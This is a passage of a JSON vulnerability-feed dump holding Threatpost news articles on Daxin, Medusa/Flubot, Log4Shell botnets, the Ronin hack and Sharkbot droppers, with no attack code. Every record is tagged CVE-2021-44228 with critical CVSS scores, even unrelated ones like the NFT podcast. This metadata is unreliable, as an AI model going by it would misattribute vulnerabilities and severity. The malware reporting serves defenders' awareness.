billions, amounts that are large enough to be unattainable for almost all cryptocurrencies currently,\u201d observed Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel. \u201cThere may be opportunities at the individual level, but for the scale of nation-state operations and expenditures, a few million or even tens of millions aren\u2019t really going to move the needle.\u201d\n\nLike Smothers, he also noted that the transparency of blockchain technology due to its nature as \u201ca public ledger\u201d makes it easier for financial authorities to observe and trace suspicious cryptocurrency transactions than if sanctioned entities used \u201ctraditional money-laundering means.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:10:04", "type": "threatpost", "title": "Russia May Use Ransomware Payouts to Avoid Sanctions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:10:04", "id": "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "href": "https://threatpost.com/russia-ransomware-payouts-avoid-sanctions/178854/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T18:09:38", "description": "The Daxin malware is taking aim at hardened government networks around the world, according to researchers, with the goal of cyberespionage.\n\nThe Symantec Threat Hunter team noticed the advanced persistent threat (APT) weapon in action in November, noting that it\u2019s \u201cthe most advanced piece of malware Symantec researchers have seen from [China-linked actors](<https://threatpost.com/victory-backdoor-apt-campaign/166700/>)\u2026exhibiting technical complexity previously unseen by such actors.\u201d\n\nThey added that Daxin\u2019s specific scope of operations includes reading and writing arbitrary files; starting and interacting with arbitrary processes; and advanced lateral movement and stealth capabilities.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) also flagged the activity, which Symantec characterized as \u201clong-running.\u201d The earliest known sample of the malware dates from 2013, when it already had a large part of the codebase fully developed.\n\n\u201cDaxin malware is a highly sophisticated rootkit backdoor with complex, stealthy command-and-control (C2) functionality that enabled remote actors to communicate with secured devices not connected directly to the internet,\u201d warned CISA, in a [Monday alert](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/28/broadcom-software-discloses-apt-actors-deploying-daxin-malware>). \u201cDaxin appears to be optimized for use against hardened targets, allowing the actors to deeply burrow into targeted networks and exfiltrate data without raising suspicions.\u201d\n\n## **Built for Stealth**\n\nFrom a technical standpoint, Daxin takes the form of a Windows kernel driver, according to Symantec\u2019s [Monday analysis](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage>), and has a focus on stealth.\n\n\u201cDaxin\u2019s capabilities suggest the attackers invested significant effort into developing communication techniques that can blend in unseen with normal network traffic on the target\u2019s network,\u201d the firm found. \u201cSpecifically, the malware avoids starting its own network services. Instead, it can abuse any legitimate services already running on the infected computers.\u201d\n\nIt communicates with legitimate services via network tunneling, they added \u2013 and further, it can set up daisy-chain communications, researchers added to move internally via hops between several linked computers.\n\n\u201cDaxin is also capable of relaying its communications across a network of infected computers within the attacked organization,\u201d they said. \u201cThe attackers can select an arbitrary path across infected computers and send a single command that instructs these computers to establish requested connectivity. This use case has been optimized by Daxin\u2019s designers.\u201d\n\nDaxin also can hijack legitimate TCP/IP connections. According to Symantec, it monitors all incoming TCP traffic for certain patterns, and when a preferred pattern is detected, it disconnects the legitimate recipient and takes over the connection.\n\n\u201cIt then performs a custom key exchange with the remote peer, where two sides follow complementary steps. The malware can be both the initiator and the target of a key exchange,\u201d according to the analysis. \u201cA successful key exchange opens an encrypted communication channel for receiving commands and sending responses. Daxin\u2019s use of hijacked TCP connections affords a high degree of stealth to its communications and helps to establish connectivity on networks with strict firewall rules. It may also lower the risk of discovery by SOC analysts monitoring for network anomalies.\u201d\n\nWhen all of this is put together, the result is that a single command message that includes all the details required to establish communication, specifically the node IP address, its TCP port number and the credentials to use during custom key exchange. When Daxin receives this message, it picks the next node from the list.\n\nThe research team linked Daxin to Chinese actors because it\u2019s usually deployed alongside tools known to be associated with Chinese espionage actors.\n\n\u201cMost of the targets appear to be organizations and governments of strategic interest to China,\u201d they added. \u201cDaxin is without doubt the most advanced piece of malware Symantec researchers have seen used by a China-linked actor.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _****_[FREE downloadable eBook](<https://bit.ly/3Jy6Bfs>)_****_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T17:55:46", "type": "threatpost", "title": "Daxin Espionage Backdoor Ups the Ante on Chinese Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T17:55:46", "id": "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "href": "https://threatpost.com/daxin-espionage-backdoor-chinese-malware/178706/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Flubot, the Android spyware that\u2019s been spreading virally since last year, has hitched its infrastructure wagon up to another mobile threat known as Medusa.\n\nThat\u2019s according to ThreatFabric, which found that Medusa is now being distributed through the same SMS-phishing infrastructure as Flubot, resulting in high-volume, side-by-side campaigns.\n\nThe Flubot malware (aka Cabassous) is delivered to targets through SMS texts that prompt them to install a \u201cmissed package delivery\u201d app or a faux version of Flash Player. If a victim falls for the ruse, the malware is installed, which adds the infected device to a botnet. Then, it sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device and squirreling away various pieces of personal information.\n\nThe malicious implant also sends out additional text messages to the infected device\u2019s contact list, which allows it [to \u201cgo viral\u201d](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) \u2013 like the flu.\n\nApparently, Medusa likes the cut of Flubot\u2019s jib: \u201cOur threat intelligence shows that Medusa followed with exactly the same app names, package names and similar icons,\u201d ThreatFabric researchers noted in a [Monday analysis](<https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html>). \u201cIn less than a month, this distribution approach allowed Medusa to reach more than 1,500 infected devices in one botnet, masquerading as DHL.\u201d\n\nAnd that\u2019s just for one botnet. ThreatFabric pointed out that Medusa has multiple botnets carrying out multiple campaigns.\n\nUnlike Flubot, which [mainly spreads](<https://threatpost.com/flubot-spyware-android-devices/165607/>) in Europe, Medusa is more of an equal-opportunity threat when it comes to geography. Recent campaigns have targeted users from Canada, Turkey and the United States.\n\n\u201cAfter targeting Turkish financial organizations in its first period of activity in 2020, Medusa has now switched its focus to North America and Europe, which results in [a] significant number of infected devices,\u201d ThreatFabric researchers noted. \u201cPowered with multiple remote-access features, Medusa poses a critical threat to financial organizations in targeted regions.\u201d\n\n## **Medusa Bursts on the Scene**\n\nFirst discovered in July 2020, Medusa (related to the Tanglebot family of RATs) is a mobile banking trojan that can gain near-complete control over a user\u2019s device, including capabilities for keylogging, banking trojan activity, and audio and video streaming. To boot, it has received several updates and improved in its obfuscation techniques as it hops on Flubot\u2019s infrastructure coattails, researchers said.\n\nFor one, it now has an accessibility-scripting engine that allows actors to perform a set of actions on the victim\u2019s behalf, with the help of Android Accessibility Service.\n\n\u201cBy abusing Accessibility Services, Medusa is able to execute commands on any app that is running on a victim\u2019s device,\u201d researchers noted. \u201cA command like \u2018fillfocus\u2019 allows the malware to set the text value of any specific text box to an arbitrary value chosen by the attacker, e.g., the beneficiary of a bank transfer.\u201d\n\nAccessibility events logging is a companion upgrade to the above. With a special command, Medusa can collect information about active windows, including the position of fields and certain elements within a user interface, any text inside those elements, and whether the field is a password field.\n\n\u201cHaving all the data collected the actor is able to get a better understanding of the interface of different applications and therefore implement relevant scenarios for accessibility scripting feature,\u201d according to ThreatFabric. \u201cMoreover, it allows actor(s) to have deeper insight on the applications the victim uses and their typical usage, while also [being able] to intercept some private data.\u201d\n\nThe following snippet shows the code that collects the information of active window going through its nodes:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/07171257/code-snippet.png>)\n\nSource: ThreatFabric.\n\nFurther, in examining Medusa\u2019s back-end panels, researchers observed the malware\u2019s operators marking banking apps with a \u201cBANK\u201d tag, to control/log the input fields.\n\n\u201cThis means that any banking app in the world is at risk to this attack, even those who do not fall within the current target list,\u201d they warned.\n\nThe command-and-control server (C2) can also command Medusa to carry out a wide variety of RAT work, including clicking on a specific UI element, sleeping, screenshotting, locking the screen, providing a list of recent apps and opening recent notifications.\n\n## **Flubot Evolves Its Capabilities**\n\nThe researchers also noticed that the addition of Medusa to the mix hasn\u2019t slowed down Flubot\u2019s own development. They explained that it now has a \u201cnovel capability never seen before in mobile banking malware.\u201d\n\nTo wit: In version 5.4, Medusa picked up the ability to abuse the \u201cNotification Direct Reply\u201d feature of Android OS, which allows the malware to directly reply to push notifications from targeted applications on a victim\u2019s device. The user isn\u2019t aware of the activity, so Flubot can thus intercept them \u2013 opening the door to thwarting two-factor authentication and more, researchers said.\n\n\u201cEvery minute the malware sends the statistics to the C2 about the notifications received,\u201d they explained. \u201cAs a response, it might receive a template string that will be used to re-create an object of intercepted notification with updated parameters, thus allowing [Flubot] authors to arbitrarily change notification content\u2026We believe that this previously unseen capability can be used by actors to sign fraudulent transactions on [a] victim\u2019s behalf, thus making notifications [a] non-reliable authentication/authorization factor on an infected device.\u201d\n\nAnother potential abuse of this functionality could be to respond to social-application interactions with \u201cnotifications\u201d containing malicious phishing links.\n\n\u201cConsidering the popularity of these type of apps and the strong focus of [Flubot] on distribution tactics, this could easily be the main MO behind this new Notification Direct Reply Abuse,\u201d according to ThreatFabric.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T22:13:29", "type": "threatpost", "title": "Medusa Malware Joins Flubot's Android Distribution Network", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T22:13:29", "id": "THREATPOST:10245D9804511A09607265485D240FFF", "href": "https://threatpost.com/medusa-malware-flubot-android-distribution/178258/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:15", "description": "Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical [remote code-execution (RCE) flaw ](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.\n\nNow under active exploit, the \u201cLog4Shell\u201d bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.\n\nFirst, analysts at NetLab 360 detected two waves of [Log4Shell attacks](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) on their honeypots, from the Muhstik and Mirai botnets.\n\n## **Mirai Tweaked to Troll for Log4Shell Vulnerability **\n\nThe analysts at Netlab 360 said this is a new variant of Mirai with a few specific innovations. First, they pointed out the code piece \u201ctable_init/table_lock_val/table_unlock_val and other Mirai-specific configuration management functions have been removed.\u201d\n\nSecondly, they added, \u201cThe attack_init function is also discarded, and the DDoS attack function is called directly by the command-processing function.\u201d\n\nFinally, they found this iteration of the Mirai botnet uses a two-level domain for its command-and-control (C2) mechanis,, which the team at Netlab 360 said was \u201crare.\u201d\n\n## **Muhstik Variant Attacks Log4Shell **\n\nThe other Linux botnet launched to take advantage of the Apache 4j Library flaw is [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>), a Mirai variant.\n\n\u201cIn this captured sample, we note that the new Muhstik variant adds a backdoor module, ldm, which has the ability to add an SSH backdoor public key with the following installed backdoor public key,\u201d Netlab 360 reported.\n\nOnce added, the public key lets a threat actor log onto the server without so much as a password, they explained.\n\n\u201cMuhstik takes a blunt approach to spread the payload aimlessly, knowing that there will be vulnerable machines, and in order to know who has been infected, Muhstik adopts TOR network for its reporting mechanism,\u201d the Netlab 360 team said.\n\nFollowing detection of those attacks, the Netlab 360 team [found](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) other botnets on the hunt for the Log4Shell vulnerability including: DDoS family Elknot; mining family m8220; SitesLoader; xmrig.pe; xmring.ELF; attack tool 1; attack tool 2; plus one unknown and a PE family.\n\n## **Geography of Log4Shell Attacks **\n\nThe majority of [exploitation attempts against Log4Shell](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>) originate in Russia, according to Kaspersky researchers who found 4,275 attacks launched from Russia, by far the most of any other region. By comparison, 351 attempts were launched from China and 1,746 from the U.S.\n\nSo far, the [Apache Log4j logging library exploit](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) has spun off 60 mutations \u2014 and it only took less than a day.\n\nThis story is developing, so stay tuned to Threatpost for [additional coverage](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>).\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ _REGISTER TODAY_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ _LIVE, interactive Threatpost Town Hall_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T19:00:01", "type": "threatpost", "title": "Where the Latest Log4Shell Attacks Are Coming From", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T19:00:01", "id": "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "href": "https://threatpost.com/log4shell-attacks-origin-botnet/176977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T14:20:09", "description": "Why in the world would a collection of nonfungible token (NFT) gorilla avatars called the Bored Ape Yacht Club (BAYC), run by 30-somethings using aliases like \u201cEmperor Tomato Ketchup\u201d and \u201cNo Sass\u201d and [adored by celebrities](<https://www.vanityfair.com/news/2022/02/bored-ape-yacht-club-revealed>), spiral on up to a [multibillion-dollar valuation](<https://www.coingecko.com/en/nft/bored-ape-yacht-club>) (\u2026and, by the way, how can you yourself get stinking crypto-rich?!)?\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30153635/Bored-Ape-Yacht-Club-NFT-scaled-e1648669046321.jpeg>)\n\nImage of Bored Ape Yacht Club NFT.\n\nIf you don\u2019t have a clue, you might be one of the crypto-newbies for whom the New York Times recently pulled together its [Latecomer\u2019s Guide to Crypto](<https://www.nytimes.com/interactive/2022/03/18/technology/cryptocurrency-crypto-guide.html>) and whom [mutual funds companies](<https://www.fidelity.com/viewpoints/active-investor/beyond-bitcoin>) are trying to [ease into](<https://economictimes.indiatimes.com/markets/cryptocurrency/crypto-investment-in-mutual-funds-style-mudrex-launches-coin-sets/articleshow/87099763.cms?from=mdr>) the brave new world.\n\nYou also might have a thousand questions that go beyond cartoon apes and get into the nitty-gritty of how cryptocurrency and blockchain technologies work and how to sidestep the associated cybersecurity risks.\n\nThose risks are big, throbbing realities. The latest: Ronin, an Ethereum-linked blockchain platform for NFT-based video game Axie Infinity, on Tuesday put up a [blog post](<https://roninblockchain.substack.com/p/community-alert-ronin-validators?s=w>) advising that 173,600 ether tokens and 25.5 million USD coins \u2013 valued at nearly $620 million as of Tuesday \u2013 had been drained from its platform after an attacker used hacked private keys to forge two fake withdrawals last week.\n\nAccording to [Forbes](<https://www.forbes.com/sites/jonathanponciano/2022/03/29/second-biggest-crypto-hack-ever-600-million-in-ethereum-stolen-from-nft-gaming-blockchain/?sh=280f0f0c2686>), blockchain analytics firm Elliptic pegs it as the second-biggest hack ever.\n\n## New Technology, Old Hacks\n\nCryptocurrency and related technologies may be shiny new concepts, but the techniques crooks are using to drain them aren\u2019t necessarily newfangled. As of its Wednesday update, Ronin said that it looks like the breach was pulled off with old-as-the-hills social engineering:\n\n> \u201cWhile the investigations are ongoing, at this point we are certain that this was an external breach. All evidence points to this attack being socially engineered, rather than a technical flaw.\u201d \u20143/30/22 Ronin alert.\n\nDr. Lydia Kostopoulos, senior vice president of emerging tech insights at [KnowBe4](<https://www.knowbe4.com/>), stopped by the Threatpost podcast to give us an overview of this brave new world of blockchain: a landscape of new technologies that are making wallets swell and shrink and hearts to flutter in dismay when such things as the Ronin hack transpire.\n\nShe shared her insights into everything from how such technologies work to what the associated cybersecurity risks are, including:\n\n * How blockchain technologies, including NFTs, work.\n * The cybersecurity risks that might emerge from the use of NFTs/cryptocurrency, including popular scams/social engineering attempts circulating today.\n * Steps individuals/businesses can take to protect themselves.\n * What is driving their popularity and if NFTs are here to stay.\n * Regulations on blockchain technology.\n\nYou\u2019ve heard it a thousand times before, but Dr. Kostopoulos says it\u2019s real: Blockchain technology is transformative. Look out for state-backed currencies and blockchain-enabled voting that can\u2019t be tampered with, for starters. Look for NFT invitations to artists\u2019 performances that keep giving as those artists reward their ticket holders with future swag. And for the love of Pete, don\u2019t lose your cold wallets if you want to keep your crypto safe.\n\nIf you don\u2019t yet know what a cold wallet is, definitely have a listen!\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/032522_KnowBe4_Lydia_mixdown_2.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T13:00:09", "type": "threatpost", "title": "A Blockchain Primer and Bored Ape Headscratcher \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T13:00:09", "id": "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "href": "https://threatpost.com/a-blockchain-primer-and-a-bored-ape-headscratcher-podcast/179179/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T16:20:58", "description": "Researchers have found the info-stealing Android malware Sharkbot lurking unsuspected in the depths of the Google Play store under the cover of anti-virus (AV) solutions.\n\nWhile analyzing suspicious applications on the store, the Check Point Research (CPR) team found what purported to be genuine AV solutions downloading and installing the malware, which steals credentials and banking info from Android devices but also has a range of other unique features.\n\n\u201cSharkbot lures victims to enter their credentials in windows that mimic benign credential input forms,\u201d CPR researchers Alex Shamsur and Raman Ladutska wrote in a [report](<https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/>) published Thursday. \u201cWhen the user enters credentials in these windows, the compromised data is sent to a malicious server.\u201d\n\nResearchers discovered six different applications\u2014including ones named Atom Clean-Booster, Antivirus; Antvirus Super Cleaner; and Center Security-Antivirus\u2014spreading Sharkbot. The apps came from three developer accounts\u2013Zbynek Adamcik, Adelmio Pagnotto and Bingo Like Inc.\u2014at least two of which were active in the autumn of last year. The timeline makes sense, as Sharkbot [first came onto researchers\u2019](<https://blog.malwarebytes.com/trojans/2021/11/sharkbot-android-banking-trojan-cleans-users-out/>) radar screens in November.\n\n\u201cSome of the applications linked to these accounts were removed from Google Play, but still exist in unofficial markets,\u201d researchers wrote. \u201cThis could mean that the actor behind the applications is trying to stay under the radar while still involved in malicious activity.\u201d\n\nGoogle removed the offending applications, but not before they were downloaded and installed about 15,000 times, researchers said. Primary targets of Sharkbot are users in the United Kingdom and Italy, as was previously the case, they said.\n\n## **Unique Aspects**\n\nCPR researchers peered under the hood of Sharkbot and uncovered not only typical info-stealing tactics, but also some characteristics that set it apart from typical Android malware, researchers said. It includes a geofencing feature that selects users based on geographic areas, ignoring users from China, India, Romania, Russia, Ukraine or Belarus, they said.\n\nSharkbot also boasts some clever techniques, researchers noted. \u201cIf the malware detects it is running in a sandbox, it stops the execution and quits,\u201d they wrote.\n\nAnother unique hallmark of the malware is that it makes use of Domain Generation Algorithm (DGA), an aspect rarely used in malware for the Android platform, researchers said.\n\n\u201cWith DGA, one sample with a hardcoded seed generates seven domains per week,\u201d they wrote. \u201cIncluding all the seeds and algorithms we have observed, there is a total of 56 domains per week, i.e., 8 different combinations of seed/algorithm.\u201d\n\nResearchers observed 27 versions of Sharkbot in their research; the main difference between versions was different DGA seeds as well as different botnetID and ownerID fields, they said.\n\nAll in all, Sharkbot implements 22 commands that allow various malicious actions to be executed on a user\u2019s Android device, including: requesting permission for sending SMS messages; uninstalling a given applications; sending the device\u2019s contact list to a server; disabling battery optimization so Sharkbot can run in the background; and imitating the user\u2019s swipe over the screen.\n\n## **Timeline of Activity**\n\nResearchers first discovered four applications of the Sharkbot Dropper on Google Play on Feb. 25 and shortly thereafter reported their findings to Google on March 3. Google removed the applications on March 9 but then another Sharkbot dropper was discovered six days later, on March 15.\n\nCPR reported the third dropper discovered immediately and then found two more Sharkbot droppers on March 22 and March 27 that they also reported quickly to Google for removal.\n\nThe droppers by which Sharkbot spreads in and of themselves should raise concern, researchers said. \u201cAs we can judge by the functionality of the droppers, their possibilities clearly pose a threat by themselves, beyond just dropping the malware,\u201d they wrote in the report.\n\nSpecifically, researchers found the Sharkbot dropper masquerading as the following applications on Google Play;\n\n * com.abbondioendrizzi.tools[.]supercleaner\n * com.abbondioendrizzi.antivirus.supercleaner\n * com.pagnotto28.sellsourcecode.alpha\n * com.pagnotto28.sellsourcecode.supercleaner\n * com.antivirus.centersecurity.freeforall\n * com.centersecurity.android.cleaner\n\nThe droppers also have a few of their own evasion tactics, such as detecting emulators and quitting if one is found, researchers noted. They also are able to inspect and act on all the UI events of the device as well as replace notifications sent by other applications.\n\n\u201cIn addition, they can install an APK downloaded from the CnC, which provides a convenient starting point to spread the malware as soon as the user installs such an application on the device,\u201d researchers added.\n\n## **Google Play Under Fire**\n\nGoogle has [long struggled](<https://threatpost.com/google-play-malware-spy-trojans/164601/>) with the persistence of malicious applications and [malware](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>) on its Android app store and has made significant efforts to clean up its act.\n\nHowever, the emergence of Sharkbot disguised as AV solutions shows that attackers are getting sneakier in how they hide their malicious activity on the platform, and could serve to damage users\u2019 confidence in Google Play, noted a security professional.\n\n\u201cMalware apps that conceal their malicious functionality with time delays, code obfuscation and geofencing can be challenging to detect during the app review process, but the regularity that they are discovered lurking in official app stores really damages user trust in the safety of all apps on the platform,\u201d observed Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://www.cerberussentinel.com/>), in an email to Threatpost**.**\n\nWith the smartphone at the center of people\u2019s digital lives and actins as a hub of financial, personal and work activity, \u201cany malware that compromises the security of such a central device can do significant financial or reputational damage,\u201d he added.\n\nAnother security professional urged caution to Android users when deciding whether or not to download a mobile app from a reputable vendor\u2019s store, even if it\u2019s a trusted brand.\n\n\u201cWhen installing apps from various technology stores, it is best to research the app before downloading it,\u201d observed James McQuiggan, security awareness advocate at [KnowBe4](<http://www.knowbe4.com/>). **\u201c**Cybercriminals love to trick users into installing malicious apps with hidden functionalities in an attempt to steal data or take over accounts.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-08T16:06:29", "type": "threatpost", "title": "Google 